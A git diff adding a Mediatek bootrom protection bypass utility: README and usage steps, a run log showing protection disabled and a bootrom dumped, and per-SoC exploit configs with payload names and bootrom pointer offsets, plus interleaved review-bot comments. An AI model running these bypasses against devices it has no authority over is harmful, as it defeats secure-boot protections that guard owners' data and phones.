diff --git a/.gitattributes b/.gitattributes
index a6344aac8c09253b3b630fb776ae94478aa0275b..33713e6ef57a41e824a315eacd73783f02667c88 100644
--- a/.gitattributes
+++ b/.gitattributes
@@ -33,3 +33,5 @@ saved_model/**/* filter=lfs diff=lfs merge=lfs -text
 *.zip filter=lfs diff=lfs merge=lfs -text
 *.zst filter=lfs diff=lfs merge=lfs -text
 *tfevents* filter=lfs diff=lfs merge=lfs -text
+UsbDk_1.0.22_x64.msi filter=lfs diff=lfs merge=lfs -text
+libusb-1.0.dll filter=lfs diff=lfs merge=lfs -text
diff --git a/HOW_TO_USE.txt b/HOW_TO_USE.txt
new file mode 100644
index 0000000000000000000000000000000000000000..31eb0da2c31d49c320b4d18c8dffacfc0964f59b
--- /dev/null
+++ b/HOW_TO_USE.txt
@@ -0,0 +1,5 @@
+1. Install python
+2. Install UsbDk (64-bit)
+3. Run `pip install pyusb==1.1.1 json5`
+4. Run `python main.py'
+5. Power off device & connect via usb in BROM Mode(https://androidrepairguide.blogspot.com/2025/04/connect-mediatek-device-in-brom-mode.html)
\ No newline at end of file
diff --git a/LICENSE b/LICENSE
new file mode 100644
index 0000000000000000000000000000000000000000..53e82be94b1b602bfa3b2ab3bb0449e9c3a02d09
--- /dev/null
+++ b/LICENSE
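Review bot: `UsbDk_1.0.22_x64.msi` and `libusb-1.0.dll` are registered for LFS here with no recorded provenance, and the only integrity value the repository carries is the LFS oid of the committed blob, which cannot be checked against anything published upstream. README.md and HOW_TO_USE.txt already send users to the UsbDk releases page, so either drop the in-repo installer in favor of that link or add a short notes file (e.g. `THIRD_PARTY.md`) recording the upstream release URL and its published SHA-256 so a user can verify the MSI before installing a kernel driver from it. Only the MSI's LFS pointer is visible in this chunk; the `libusb-1.0.dll` addition, if it exists, is outside it. The same commit also checks in `bypass_utility.log`, a run log that belongs in `.gitignore` rather than in the tree.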
@@ -0,0 +1,21 @@
+MIT License
+
+Copyright (c) 2021 Dinolek
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.
diff --git a/README.md b/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..cc32c79889c6c3683e6a416bd706c363eb9f5214
--- /dev/null
+++ b/README.md
@@ -0,0 +1,52 @@
+# Mediatek Bypass utility
+
+> Personally tested on `Infinix Hot 10 Play X688B`
+
+Small utility to disable bootrom protection(sla and daa) on Mediatek devices
+
+## Usage on Windows
+
+Skip steps 1-3 after first usage
+
+1. Install [python (64-bit)](https://www.python.org/downloads)(select "Add Python X.X to PATH")
+2. Install [UsbDk (64-bit)](https://github.com/daynix/UsbDk/releases)
+3. Install pyusb, json5 with command:
+
+```
+pip install pyusb==1.1.1 json5
+```
+
+4. Run this command and connect your powered off phone with volume+ button, you should get "Protection disabled" at the end
+
+```
+python main.py
+```
+
+5. After that, without disconnecting phone, run SP Flash Tool
+
+## Usage on Linux
+
+Skip steps 1-2 after first usage
+To use kamakiri you need [FireISO](https://github.com/amonet-kamakiri/fireiso/releases) or [this patch](https://github.com/amonet-kamakiri/kamakiri/blob/master/kernel.patch) for your kernel
+
+Prebuilt kernels for various distros are available [here](https://github.com/amonet-kamakiri/prebuilt-kernels)
+
+1. Install python
+2. Install pyusb, json5 as root with command:
+
+```
+pip install pyusb json5
+```
+
+3. Run this command as root and connect your powered off phone with volume+ button, you should get "Protection disabled" at the end
+
+```
+./main.py
+```
+
+4. After that, without disconnecting phone, run SP Flash Tool in UART Connection mode
+
+## Credits
+
+- [@chaosmaster](https://github.com/chaosmaster)
+- [@xyzz](https://github.com/xyzz)
diff --git a/UsbDk_1.0.22_x64.msi b/UsbDk_1.0.22_x64.msi
new file mode 100644
index 0000000000000000000000000000000000000000..3f611f21c5e2145f3a2f6484eda7bcb4121f3b06
--- /dev/null
+++ b/UsbDk_1.0.22_x64.msi
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:91f6f695e1e13c656024e6d3b55620bf08d8835ef05ee0496935ba6bb62466a5
+size 6348800
diff --git a/bypass_utility.log b/bypass_utility.log
new file mode 100644
index 0000000000000000000000000000000000000000..9e4e7fc29108f0794fc0e4bf3d0f84f2615d8872
--- /dev/null
+++ b/bypass_utility.log
@@ -0,0 +1,258 @@ +[2025-03-30 18:55:40.163719] Waiting for device +[2025-03-30 18:55:52.424270] Found device = 0e8d:0003 +[2025-03-30 18:55:52.650426] Device hw code: 0x766 +[2025-03-30 18:55:52.650426] Device hw sub code: 0x8a00 +[2025-03-30 18:55:52.651427] Device hw version: 0xca00 +[2025-03-30 18:55:52.651427] Device sw version: 0x0 +[2025-03-30 18:55:52.652427] Device secure boot: True +[2025-03-30 18:55:52.653429] Device serial link authorization: False +[2025-03-30 18:55:52.653429] Device download agent authorization: True +[2025-03-30 18:55:52.654428] Disabling watchdog timer +[2025-03-30 18:55:52.656534] Disabling protection +[2025-03-30 18:55:52.684046] Protection disabled +[2025-03-30 18:59:45.675191] Waiting for device +[2025-03-30 19:00:05.607088] Found device = 0e8d:0003 +[2025-03-30 19:00:05.838795] Device hw code: 0x766 +[2025-03-30 19:00:05.839797] Device hw sub code: 0x8a00 +[2025-03-30 19:00:05.839797] Device hw version: 0xca00 +[2025-03-30 19:00:05.840798] Device sw version: 0x0 +[2025-03-30 19:00:05.841799] Device secure boot: True +[2025-03-30 19:00:05.842799] Device serial link authorization: False +[2025-03-30 19:00:05.843798] Device download agent authorization: True +[2025-03-30 19:00:05.844797] Disabling watchdog timer +[2025-03-30 19:00:05.846797] Disabling protection +[2025-03-30 19:00:05.874968] Protection disabled +[2025-03-30 19:06:55.042281] Waiting for device +[2025-03-30 19:07:02.741112] Found device = 0e8d:0003 +[2025-03-30 19:07:02.963512] Device hw code: 0x766 +[2025-03-30 19:07:02.964513] Device hw sub code: 0x8a00 +[2025-03-30 19:07:02.965513] Device hw version: 0xca00 +[2025-03-30 19:07:02.965513] Device sw version: 0x0 +[2025-03-30 19:07:02.966513] Device secure boot: True +[2025-03-30 19:07:02.967514] Device serial link authorization: False +[2025-03-30 19:07:02.967514] Device download agent authorization: True +[2025-03-30 19:07:02.968514] Disabling watchdog timer +[2025-03-30 19:07:02.970879] Disabling protection 
+[2025-03-30 19:07:02.999589] Protection disabled +[2025-03-30 19:24:07.022011] Waiting for device +[2025-03-30 19:24:45.045941] Found device = 0e8d:0003 +[2025-03-30 19:24:45.292066] Device hw code: 0x766 +[2025-03-30 19:24:45.292066] Device hw sub code: 0x8a00 +[2025-03-30 19:24:45.293068] Device hw version: 0xca00 +[2025-03-30 19:24:45.295068] Device sw version: 0x0 +[2025-03-30 19:24:45.296067] Device secure boot: True +[2025-03-30 19:24:45.296067] Device serial link authorization: False +[2025-03-30 19:24:45.297067] Device download agent authorization: True +[2025-03-30 19:24:45.298068] Disabling watchdog timer +[2025-03-30 19:24:45.300067] Disabling protection +[2025-03-30 19:24:45.331068] Protection disabled +[2025-03-30 14:27:17.677816] Waiting for device +[2025-03-30 14:28:01.724914] Found device = 0e8d:0003 +[2025-03-30 14:28:01.972474] Device hw code: 0x766 +[2025-03-30 14:28:01.972474] Device hw sub code: 0x8a00 +[2025-03-30 14:28:01.973473] Device hw version: 0xca00 +[2025-03-30 14:28:01.973473] Device sw version: 0x0 +[2025-03-30 14:28:01.974474] Device secure boot: True +[2025-03-30 14:28:01.974474] Device serial link authorization: False +[2025-03-30 14:28:01.975473] Device download agent authorization: True +[2025-03-30 14:28:01.976475] Disabling watchdog timer +[2025-03-30 14:28:01.978241] Disabling protection +[2025-03-30 14:28:01.989243] Using kamakiri +[2025-03-30 14:28:01.999445] Protection disabled +[2025-03-30 14:31:17.857838] Waiting for device +[2025-03-30 14:31:26.788119] Found device = 0e8d:0003 +[2025-03-30 14:31:27.015928] Device hw code: 0x766 +[2025-03-30 14:31:27.016928] Device hw sub code: 0x8a00 +[2025-03-30 14:31:27.016928] Device hw version: 0xca00 +[2025-03-30 14:31:27.017929] Device sw version: 0x0 +[2025-03-30 14:31:27.018927] Device secure boot: True +[2025-03-30 14:31:27.018927] Device serial link authorization: False +[2025-03-30 14:31:27.019928] Device download agent authorization: True +[2025-03-30 14:31:27.019928] 
Disabling watchdog timer +[2025-03-30 14:31:27.021927] Disabling protection +[2025-03-30 14:31:27.022929] Using kamakiri +[2025-03-30 14:31:27.034260] Protection disabled +[2025-03-30 15:00:38.624821] Waiting for device +[2025-03-30 15:00:49.075305] Found device = 0e8d:0003 +[2025-03-30 15:00:49.301589] Device hw code: 0x766 +[2025-03-30 15:00:49.302589] Device hw sub code: 0x8a00 +[2025-03-30 15:00:49.303590] Device hw version: 0xca00 +[2025-03-30 15:00:49.303590] Device sw version: 0x0 +[2025-03-30 15:00:49.304589] Device secure boot: True +[2025-03-30 15:00:49.304589] Device serial link authorization: False +[2025-03-30 15:00:49.305590] Device download agent authorization: True +[2025-03-30 15:00:49.306591] Disabling watchdog timer +[2025-03-30 15:00:49.308590] Disabling protection +[2025-03-30 15:00:49.310590] Using kamakiri +[2025-03-30 15:00:49.321530] Protection disabled +[2025-03-30 15:58:29.967337] Waiting for device +[2025-03-30 15:58:53.410958] Found device = 0e8d:0003 +[2025-03-30 15:58:53.710266] Device hw code: 0x766 +[2025-03-30 15:58:53.711267] Device hw sub code: 0x8a00 +[2025-03-30 15:58:53.711267] Device hw version: 0xca00 +[2025-03-30 15:58:53.712267] Device sw version: 0x0 +[2025-03-30 15:58:53.712267] Device secure boot: True +[2025-03-30 15:58:53.713267] Device serial link authorization: False +[2025-03-30 15:58:53.714266] Device download agent authorization: True +[2025-03-30 15:58:53.715266] Disabling watchdog timer +[2025-03-30 15:58:53.717291] Disabling protection +[2025-03-30 15:58:53.749015] Protection disabled +[2025-03-30 16:03:40.629448] Waiting for device +[2025-03-30 16:03:47.032978] Found device = 0e8d:0003 +[2025-03-30 16:03:47.302838] Device hw code: 0x766 +[2025-03-30 16:03:47.303838] Device hw sub code: 0x8a00 +[2025-03-30 16:03:47.304839] Device hw version: 0xca00 +[2025-03-30 16:03:47.305839] Device sw version: 0x0 +[2025-03-30 16:03:47.306840] Device secure boot: True +[2025-03-30 16:03:47.307842] Device serial link 
authorization: False +[2025-03-30 16:03:47.308840] Device download agent authorization: True +[2025-03-30 16:03:47.308840] Disabling watchdog timer +[2025-03-30 16:03:47.311839] Disabling protection +[2025-03-30 16:03:47.342886] Protection disabled +[2025-03-30 16:04:19.031387] Waiting for device +[2025-03-30 16:04:36.829544] Found device = 0e8d:0003 +[2025-03-30 16:04:37.098365] Device hw code: 0x766 +[2025-03-30 16:04:37.098365] Device hw sub code: 0x8a00 +[2025-03-30 16:04:37.099366] Device hw version: 0xca00 +[2025-03-30 16:04:37.100366] Device sw version: 0x0 +[2025-03-30 16:04:37.100366] Device secure boot: True +[2025-03-30 16:04:37.101367] Device serial link authorization: False +[2025-03-30 16:04:37.102367] Device download agent authorization: True +[2025-03-30 16:04:37.102367] Disabling watchdog timer +[2025-03-30 16:04:37.105274] Disabling protection +[2025-03-30 16:04:37.177177] Protection disabled +[2025-03-30 16:24:47.810791] Waiting for device +[2025-03-30 16:26:05.907340] Found device = 0e8d:2000 +[2025-03-30 16:26:17.839154] Device hw code: 0x766 +[2025-03-30 16:26:17.839154] Device hw sub code: 0x8a00 +[2025-03-30 16:26:17.840160] Device hw version: 0xca00 +[2025-03-30 16:26:17.841157] Device sw version: 0x0 +[2025-03-30 16:26:17.842157] Device secure boot: True +[2025-03-30 16:26:17.843157] Device serial link authorization: False +[2025-03-30 16:26:17.843157] Device download agent authorization: True +[2025-03-30 16:26:17.845157] Found device in preloader mode, trying to crash... 
+[2025-03-30 16:26:17.847157] status is 7024 +[2025-03-30 16:26:18.854501] Waiting for device +[2025-03-30 16:26:18.856501] Found device = 0e8d:0003 +[2025-03-30 16:26:19.119788] Device hw code: 0x766 +[2025-03-30 16:26:19.119788] Device hw sub code: 0x8a00 +[2025-03-30 16:26:19.121053] Device hw version: 0xca00 +[2025-03-30 16:26:19.122054] Device sw version: 0x0 +[2025-03-30 16:26:19.122054] Device secure boot: True +[2025-03-30 16:26:19.123055] Device serial link authorization: False +[2025-03-30 16:26:19.124054] Device download agent authorization: True +[2025-03-30 16:26:19.124054] Disabling watchdog timer +[2025-03-30 16:26:19.126714] Disabling protection +[2025-03-30 16:26:19.156884] Protection disabled +[2025-03-30 16:28:14.415118] Waiting for device +[2025-03-30 16:28:14.417119] Found device = 0e8d:0003 +[2025-03-30 16:28:14.684816] Device hw code: 0x766 +[2025-03-30 16:28:14.685815] Device hw sub code: 0x8a00 +[2025-03-30 16:28:14.686816] Device hw version: 0xca00 +[2025-03-30 16:28:14.686816] Device sw version: 0x0 +[2025-03-30 16:28:14.687816] Device secure boot: False +[2025-03-30 16:28:14.687816] Device serial link authorization: False +[2025-03-30 16:28:14.688817] Device download agent authorization: False +[2025-03-30 16:28:14.689818] Disabling watchdog timer +[2025-03-30 16:28:14.692135] Insecure device, sending payload using send_da +[2025-03-30 16:28:14.748482] Found send_dword, dumping bootrom to bootrom_766.bin +[2025-03-30 16:29:05.907328] Waiting for device +[2025-03-30 16:29:09.219474] Found device = 0e8d:2000 +[2025-03-30 16:29:20.608828] Device hw code: 0x766 +[2025-03-30 16:29:20.609829] Device hw sub code: 0x8a00 +[2025-03-30 16:29:20.610816] Device hw version: 0xca00 +[2025-03-30 16:29:20.610816] Device sw version: 0x0 +[2025-03-30 16:29:20.612815] Device secure boot: True +[2025-03-30 16:29:20.613815] Device serial link authorization: False +[2025-03-30 16:29:20.613815] Device download agent authorization: True +[2025-03-30 
16:29:20.614831] Found device in preloader mode, trying to crash... +[2025-03-30 16:29:20.617909] status is 7024 +[2025-03-30 16:29:21.620024] Waiting for device +[2025-03-30 16:29:21.622036] Found device = 0e8d:0003 +[2025-03-30 16:29:21.867785] Device hw code: 0x766 +[2025-03-30 16:29:21.868785] Device hw sub code: 0x8a00 +[2025-03-30 16:29:21.868785] Device hw version: 0xca00 +[2025-03-30 16:29:21.869786] Device sw version: 0x0 +[2025-03-30 16:29:21.869786] Device secure boot: True +[2025-03-30 16:29:21.870786] Device serial link authorization: False +[2025-03-30 16:29:21.871787] Device download agent authorization: True +[2025-03-30 16:29:21.872791] Disabling watchdog timer +[2025-03-30 16:29:21.875154] Disabling protection +[2025-03-30 16:29:21.905106] Protection disabled +[2025-03-30 16:48:01.676685] Waiting for device +[2025-03-30 16:48:01.677686] Found device = 0e8d:2000 +[2025-03-30 16:48:13.037939] Device hw code: 0x766 +[2025-03-30 16:48:13.037939] Device hw sub code: 0x8a00 +[2025-03-30 16:48:13.038942] Device hw version: 0xca00 +[2025-03-30 16:48:13.039941] Device sw version: 0x0 +[2025-03-30 16:48:13.039941] Device secure boot: True +[2025-03-30 16:48:13.040941] Device serial link authorization: False +[2025-03-30 16:48:13.042941] Device download agent authorization: True +[2025-03-30 16:48:13.043942] Found device in preloader mode, trying to crash... 
+[2025-03-30 16:48:13.047942] status is 7024 +[2025-03-30 16:48:14.057950] Waiting for device +[2025-03-30 16:48:14.058950] Found device = 0e8d:0003 +[2025-03-30 16:48:14.320814] Device hw code: 0x766 +[2025-03-30 16:48:14.321814] Device hw sub code: 0x8a00 +[2025-03-30 16:48:14.322814] Device hw version: 0xca00 +[2025-03-30 16:48:14.322814] Device sw version: 0x0 +[2025-03-30 16:48:14.323814] Device secure boot: True +[2025-03-30 16:48:14.325324] Device serial link authorization: False +[2025-03-30 16:48:14.327346] Device download agent authorization: True +[2025-03-30 16:48:14.328346] Disabling watchdog timer +[2025-03-30 16:48:14.330887] Disabling protection +[2025-03-30 16:48:14.363226] Protection disabled +[2025-03-30 16:50:45.192561] Waiting for device +[2025-03-30 16:51:25.446559] Found device = 0e8d:2000 +[2025-03-30 16:51:37.474047] Device hw code: 0x766 +[2025-03-30 16:51:37.475048] Device hw sub code: 0x8a00 +[2025-03-30 16:51:37.476050] Device hw version: 0xca00 +[2025-03-30 16:51:37.477048] Device sw version: 0x0 +[2025-03-30 16:51:37.477048] Device secure boot: True +[2025-03-30 16:51:37.478050] Device serial link authorization: False +[2025-03-30 16:51:37.479049] Device download agent authorization: True +[2025-03-30 16:51:37.480049] Found device in preloader mode, trying to crash... 
+[2025-03-30 16:51:37.482048] status is 7024 +[2025-03-30 16:51:38.490922] Waiting for device +[2025-03-30 16:51:38.492932] Found device = 0e8d:0003 +[2025-03-30 16:51:38.703067] Device hw code: 0x766 +[2025-03-30 16:51:38.704575] Device hw sub code: 0x8a00 +[2025-03-30 16:51:38.704575] Device hw version: 0xca00 +[2025-03-30 16:51:38.706006] Device sw version: 0x0 +[2025-03-30 16:51:38.707006] Device secure boot: True +[2025-03-30 16:51:38.708007] Device serial link authorization: False +[2025-03-30 16:51:38.709010] Device download agent authorization: True +[2025-03-30 16:51:38.709010] Disabling watchdog timer +[2025-03-30 16:51:38.711008] Disabling protection +[2025-03-30 16:51:38.741665] Protection disabled +[2025-03-30 17:29:04.508432] Waiting for device +[2025-03-30 17:29:25.433937] Found device = 0e8d:2000 +[2025-03-30 17:29:36.976516] Device hw code: 0x766 +[2025-03-30 17:29:36.977516] Device hw sub code: 0x8a00 +[2025-03-30 17:29:36.978517] Device hw version: 0xca00 +[2025-03-30 17:29:36.979518] Device sw version: 0x0 +[2025-03-30 17:29:36.982520] Device secure boot: True +[2025-03-30 17:29:36.982520] Device serial link authorization: False +[2025-03-30 17:29:36.983517] Device download agent authorization: True +[2025-03-30 17:29:36.984519] Found device in preloader mode, trying to crash... 
+[2025-03-30 17:29:36.987517] status is 7024 +[2025-03-30 17:29:37.998632] Waiting for device +[2025-03-30 17:29:38.000634] Found device = 0e8d:0003 +[2025-03-30 17:29:38.267953] Device hw code: 0x766 +[2025-03-30 17:29:38.267953] Device hw sub code: 0x8a00 +[2025-03-30 17:29:38.269465] Device hw version: 0xca00 +[2025-03-30 17:29:38.269465] Device sw version: 0x0 +[2025-03-30 17:29:38.271801] Device secure boot: True +[2025-03-30 17:29:38.271801] Device serial link authorization: False +[2025-03-30 17:29:38.272799] Device download agent authorization: True +[2025-03-30 17:29:38.273802] Disabling watchdog timer +[2025-03-30 17:29:38.275799] Disabling protection +[2025-03-30 17:29:38.308307] Protection disabled +[2025-03-31 11:21:37.435686] Waiting for device +[2025-03-31 11:22:51.706012] Waiting for device +[2025-03-31 18:00:48.057530] Waiting for device +[2025-03-31 18:01:03.802597] Found device = 0e8d:2000 +[2025-04-17 14:51:05.202982] Waiting for device +[2025-04-17 14:53:10.254121] Waiting for device +[2025-04-17 14:54:45.863924] Waiting for device +[2025-04-17 14:55:22.032165] Waiting for device diff --git a/default_config.json5 b/default_config.json5 new file mode 100644 index 0000000000000000000000000000000000000000..61ea37b1529f6745d607eae2b0c2aedb0dc24cba --- /dev/null +++ b/default_config.json5 
@@ -0,0 +1,216 @@
+{
+ "0x6261": { // mt6261
+ "payload": "mt6261_payload.bin",
+ "var_1": 0x28,
+ "watchdog_address": 0xA0030000,
+ },
+
+ "0x6572": { // mt6572
+ "payload": "mt6572_payload.bin",
+ "payload_address": 0x10036A0,
+ "ptr_usbdl": 0x40ba68,
+ "ptr_da": 0x40befc,
+ },
+
+ "0x6580": { // mt6580
+ "payload": "mt6580_payload.bin",
+ "var_1": 0xAC,
+ "ptr_usbdl": 0xb60c,
+ "ptr_da": 0xba94,
+ },
+
+ "0x6582": { // mt6582
+ "payload": "mt6582_payload.bin",
+ "ptr_usbdl": 0xa5fc,
+ "ptr_da": 0xaa84,
+ },
+
+ "0x6592": { // mt6592
+ "payload": "mt6592_payload.bin",
+ "ptr_usbdl": 0xa564,
+ "ptr_da": 0xa9ec,
+ },
+
+ "0x6595": { // mt6595
+ "payload": "mt6595_payload.bin",
+ "ptr_usbdl": 0xb218,
+ "ptr_da": 0xb6a0,
+ },
+
+ "0x321": { // mt6735
+ "watchdog_address": 0x10212000,
+ "var_0": 0x10,
+ "var_1": 0x28,
+ "payload": "mt6735_payload.bin",
+ "ptr_usbdl": 0x95f8,
+ "ptr_da": 0x9a94,
+ },
+
+ "0x335": { // mt6737
+ "watchdog_address": 0x10212000,
+ "var_0": 0x10,
+ "var_1": 0x28,
+ "payload": "mt6737_payload.bin",
+ "ptr_usbdl": 0x9608,
+ "ptr_da": 0x9aa4,
+ },
+
+ "0x699": { // mt6739
+ "var_0": 0x20,
+ "var_1": 0xB4,
+ "payload": "mt6739_payload.bin",
+ "ptr_usbdl": 0xdf1c,
+ "ptr_da": 0xe3e8,
+ },
+
+ "0x337": { // mt6753
+ "watchdog_address": 0x10212000,
+ "var_1": 0x28,
+ "payload": "mt6753_payload.bin",
+ "ptr_usbdl": 0x9668,
+ "ptr_da": 0x9b04,
+ },
+
+ "0x326": { // mt6755
+ "payload": "mt6755_payload.bin",
+ "ptr_usbdl": 0x9a6c,
+ "ptr_da": 0x9f14,
+ },
+
+ "0x551": { // mt6757
+ "payload": "mt6757_payload.bin",
+ "ptr_usbdl": 0x9c2c,
+ "ptr_da": 0xa0e8,
+ },
+
+ "0x717": { // mt6761
+ "var_1": 0x25,
+ "payload": "mt6761_payload.bin",
+ "ptr_usbdl": 0xbc8c,
+ "ptr_da": 0xc158,
+ },
+
+ "0x690": { // mt6763
+ "var_1": 0x7F,
+ "payload": "mt6763_payload.bin",
+ "ptr_usbdl": 0xd66c,
+ "ptr_da": 0xdb38,
+ },
+
+ "0x766": { // mt6765
+ "var_0": 0x2C,
+ "var_1": 0x25,
+ "payload": "mt6765_payload.bin",
+ "ptr_usbdl": 0xbdc0,
+ "ptr_da": 0xc28c
+ },
+
+ 
"0x707": { // mt6768
+ "var_0": 0x2C,
+ "var_1": 0x25,
+ "payload": "mt6768_payload.bin",
+ "ptr_usbdl": 0xc190,
+ "ptr_da": 0xc650,
+ },
+
+ "0x788": { // mt6771
+ "var_0": 0x20,
+ "payload": "mt6771_payload.bin",
+ "ptr_usbdl": 0xdebc,
+ "ptr_da": 0xe388,
+ },
+
+ "0x725": { // mt6779
+ "payload": "mt6779_payload.bin",
+ "ptr_usbdl": 0xe04c,
+ "ptr_da": 0xe50c,
+ },
+
+ "0x813": { // mt6785
+ "payload": "mt6785_payload.bin",
+ "ptr_usbdl": 0xe2a4,
+ "ptr_da": 0xe764,
+ },
+
+ "0x6795": { // mt6795
+ "payload": "mt6795_payload.bin",
+ "ptr_usbdl": 0x978c,
+ "ptr_da": 0x9c28,
+ },
+
+ "0x279": { // mt6797
+ "payload": "mt6797_payload.bin",
+ "ptr_usbdl": 0x9eac,
+ "ptr_da": 0xa354,
+ },
+
+ "0x816": { // mt6885
+ "payload": "mt6885_payload.bin",
+ "ptr_usbdl": 0xe6b8,
+ "ptr_da": 0xebbc,
+ },
+
+ "0x8127": { // mt8127
+ "payload": "mt8127_payload.bin",
+ "ptr_usbdl": 0xb2b8,
+ "ptr_da": 0xb740,
+ },
+
+ "0x8163": { // mt8163
+ "var_1": 0xB1,
+ "payload": "mt8163_payload.bin",
+ "ptr_usbdl": 0xc12c,
+ "ptr_da": 0xc5c8,
+ },
+
+ "0x8167": { // mt8516
+ "var_1": 0xCC,
+ "payload": "mt8167_payload.bin",
+ "ptr_usbdl": 0xd2e4,
+ "ptr_da": 0xd7ac,
+ },
+
+ "0x8172": { // mt8173
+ "payload": "mt8173_payload.bin",
+ "payload_address": 0x120A00,
+ "ptr_usbdl": 0xa0e4,
+ "ptr_da": 0xa580,
+ },
+
+ "0x8695": { // mt8695
+ "payload": "mt8695_payload.bin",
+ "ptr_usbdl": 0xbeec,
+ "ptr_da": 0xc3f8,
+ },
+
+ "0x886": { // mt6873
+ "payload": "mt6873_payload.bin",
+ "ptr_usbdl": 0xea78,
+ "ptr_da": 0xef38,
+ },
+
+ "0x562": { // mt6799
+ "watchdog_address": 0x10211000,
+ "payload": "mt6799_payload.bin",
+ "ptr_usbdl": 0xf5ac,
+ "ptr_da": 0xfa78,
+ },
+
+ "0x989": { // mt6833
+ "payload": "mt6833_payload.bin",
+ "ptr_usbdl": 0xdfe0,
+ "ptr_da": 0xe4a0,
+ },
+
+ "0x996": { // mt6853
+ "payload": "mt6853_payload.bin",
+ "ptr_usbdl": 0xea64,
+ "ptr_da": 0xef24,
+ },
+
+ "0x8590": { // mt8590
+ "payload": "mt8590_payload.bin",
+ "ptr_usbdl": 0xbbe4,
+ "ptr_da": 0xc06c,
+ },
+}
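Review bot: The `"0x8167"` entry is commented `// mt8516` while its payload is `mt8167_payload.bin` and `exploits_collection/README.md` lists mt8167, not mt8516; if this hw code covers both parts, say so in the comment (`// mt8167 / mt8516`), otherwise align it with the payload name so the hw-code-to-SoC mapping a user relies on when adding a device is not misleading. The `"0x766"` entry is the only one without a trailing comma after `"ptr_da": 0xc28c`; valid JSON5, but worth matching the other entries. This file is byte-identical to `exploits_collection/default_config.json5` (same blob id `61ea37b1…`), so the two copies will drift; keep one and document which path `main.py` reads. `mt6750_payload.bin` is added under `exploits_collection/payloads/` and mt6750 is listed as supported, yet no key here references it, so that SoC is not actually configured unless it is wired up somewhere outside this diff.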
diff --git a/exploits_collection/README.md b/exploits_collection/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..48a7a0a9acc5d2d46b391ca64451bb9e162abef1
--- /dev/null
+++ b/exploits_collection/README.md
@@ -0,0 +1,34 @@
+### Supported SoCs
+- mt6261
+- mt6572
+- mt6580
+- mt6582
+- mt6592
+- mt6595
+- mt6735
+- mt6737
+- mt6739
+- mt6750
+- mt6753
+- mt6755
+- mt6757
+- mt6761
+- mt6763
+- mt6765
+- mt6768
+- mt6771
+- mt6779
+- mt6785
+- mt6795
+- mt6797
+- mt6799
+- mt6833
+- mt6853
+- mt6873
+- mt6885
+- mt8127
+- mt8163
+- mt8167
+- mt8173
+- mt8590
+- mt8695
diff --git a/exploits_collection/default_config.json5 b/exploits_collection/default_config.json5
new file mode 100644
index 0000000000000000000000000000000000000000..61ea37b1529f6745d607eae2b0c2aedb0dc24cba
--- /dev/null
+++ b/exploits_collection/default_config.json5
@@ -0,0 +1,216 @@
+{
+ "0x6261": { // mt6261
+ "payload": "mt6261_payload.bin",
+ "var_1": 0x28,
+ "watchdog_address": 0xA0030000,
+ },
+
+ "0x6572": { // mt6572
+ "payload": "mt6572_payload.bin",
+ "payload_address": 0x10036A0,
+ "ptr_usbdl": 0x40ba68,
+ "ptr_da": 0x40befc,
+ },
+
+ "0x6580": { // mt6580
+ "payload": "mt6580_payload.bin",
+ "var_1": 0xAC,
+ "ptr_usbdl": 0xb60c,
+ "ptr_da": 0xba94,
+ },
+
+ "0x6582": { // mt6582
+ "payload": "mt6582_payload.bin",
+ "ptr_usbdl": 0xa5fc,
+ "ptr_da": 0xaa84,
+ },
+
+ "0x6592": { // mt6592
+ "payload": "mt6592_payload.bin",
+ "ptr_usbdl": 0xa564,
+ "ptr_da": 0xa9ec,
+ },
+
+ "0x6595": { // mt6595
+ "payload": "mt6595_payload.bin",
+ "ptr_usbdl": 0xb218,
+ "ptr_da": 0xb6a0,
+ },
+
+ "0x321": { // mt6735
+ "watchdog_address": 0x10212000,
+ "var_0": 0x10,
+ "var_1": 0x28,
+ "payload": "mt6735_payload.bin",
+ "ptr_usbdl": 0x95f8,
+ "ptr_da": 0x9a94,
+ },
+
+ "0x335": { // mt6737
+ "watchdog_address": 0x10212000,
+ "var_0": 0x10,
+ "var_1": 0x28,
+ "payload": "mt6737_payload.bin",
+ "ptr_usbdl": 0x9608,
+ "ptr_da": 0x9aa4,
+ },
+
+ "0x699": { // mt6739
+ "var_0": 0x20,
+ "var_1": 0xB4,
+ "payload": "mt6739_payload.bin",
+ "ptr_usbdl": 0xdf1c,
+ "ptr_da": 0xe3e8,
+ },
+
+ "0x337": { // mt6753
+ "watchdog_address": 0x10212000,
+ "var_1": 0x28,
+ "payload": "mt6753_payload.bin",
+ "ptr_usbdl": 0x9668,
+ "ptr_da": 0x9b04,
+ },
+
+ "0x326": { // mt6755
+ "payload": "mt6755_payload.bin",
+ "ptr_usbdl": 0x9a6c,
+ "ptr_da": 0x9f14,
+ },
+
+ "0x551": { // mt6757
+ "payload": "mt6757_payload.bin",
+ "ptr_usbdl": 0x9c2c,
+ "ptr_da": 0xa0e8,
+ },
+
+ "0x717": { // mt6761
+ "var_1": 0x25,
+ "payload": "mt6761_payload.bin",
+ "ptr_usbdl": 0xbc8c,
+ "ptr_da": 0xc158,
+ },
+
+ "0x690": { // mt6763
+ "var_1": 0x7F,
+ "payload": "mt6763_payload.bin",
+ "ptr_usbdl": 0xd66c,
+ "ptr_da": 0xdb38,
+ },
+
+ "0x766": { // mt6765
+ "var_0": 0x2C,
+ "var_1": 0x25,
+ "payload": "mt6765_payload.bin",
+ "ptr_usbdl": 0xbdc0,
+ "ptr_da": 0xc28c
+ },
+
+ 
"0x707": { // mt6768
+ "var_0": 0x2C,
+ "var_1": 0x25,
